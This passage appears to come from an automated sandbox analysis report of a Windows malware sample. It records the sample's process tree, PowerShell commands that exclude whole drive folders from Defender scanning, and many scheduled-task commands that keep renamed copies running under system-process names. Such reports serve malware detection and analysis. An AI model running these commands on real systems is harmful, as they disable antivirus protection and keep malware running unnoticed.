PID 3656 wrote to memory of 4564	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	190
PID 3656 wrote to memory of 1156	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	191
PID 3656 wrote to memory of 1156	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	191
PID 3656 wrote to memory of 1348	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	192
PID 3656 wrote to memory of 1348	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	192
PID 3656 wrote to memory of 3440	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	193
PID 3656 wrote to memory of 3440	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	193
PID 3656 wrote to memory of 2744	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	194
PID 3656 wrote to memory of 2744	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	194
PID 3656 wrote to memory of 3968	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	195
PID 3656 wrote to memory of 3968	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	195
PID 3656 wrote to memory of 4712	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	196
PID 3656 wrote to memory of 4712	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	196
PID 3656 wrote to memory of 4760	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	197
PID 3656 wrote to memory of 4760	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	197
PID 3656 wrote to memory of 1472	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	209
PID 3656 wrote to memory of 1472	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	209
PID 1472 wrote to memory of 1160	1472	explorer.exe	210
PID 1472 wrote to memory of 1160	1472	explorer.exe	210
PID 1472 wrote to memory of 1444	1472	explorer.exe	211
PID 1472 wrote to memory of 1444	1472	explorer.exe	211
PID 1160 wrote to memory of 2132	1160	WScript.exe	213
PID 1160 wrote to memory of 2132	1160	WScript.exe	213

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
"C:\Users\Admin\AppData\Local\Temp\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\35UmqwIyoT.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3752
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:5028
- - C:\Users\Admin\AppData\Local\Temp\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
    "C:\Users\Admin\AppData\Local\Temp\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4760
  - - C:\Users\Default\explorer.exe
      "C:\Users\Default\explorer.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1472
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\55393b1a-faf6-4591-bc89-0dce76ccd430.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1160
      - C:\Users\Default\explorer.exe
        
        C:\Users\Default\explorer.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c0d87a24-b66c-4ee3-86bc-ff3affe4a7a5.vbs"
        5⤵
        
        PID:1444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files\Google\Chrome\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\es-ES\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MusNotificationM" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\MusNotification.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MusNotification" /sc ONLOGON /tr "'C:\Users\Default User\MusNotification.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MusNotificationM" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\MusNotification.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\SoftwareDistribution\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\SoftwareDistribution\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Videos\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Users\Public\AccountPictures\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\Public\AccountPictures\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Microsoft\Spectrum\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Spectrum\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\Spectrum\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Services\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Services\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Windows\Sun\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Windows\Sun\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Windows\Sun\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\Accessories\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb99" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Pictures\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9" /sc ONLOGON /tr "'C:\Users\Default\Pictures\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb99" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Pictures\916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\Skins\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Skins\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\Skins\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\PolicyDefinitions\ja-JP\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\ja-JP\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\ja-JP\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Windows\SchCache\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\SchCache\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Windows\SchCache\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Default\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Default\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Windows\ModemLogs\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\ModemLogs\sihost.exe'" /rl HIGHEST /f
1⤵
PID:2216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Windows\ModemLogs\sihost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Videos\sppsvc.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\Videos\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Videos\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Windows\System32\MailContactsCalendarSync\TextInputHost.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\System32\MailContactsCalendarSync\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:4992

C:\Windows\system32\schtasks.exe
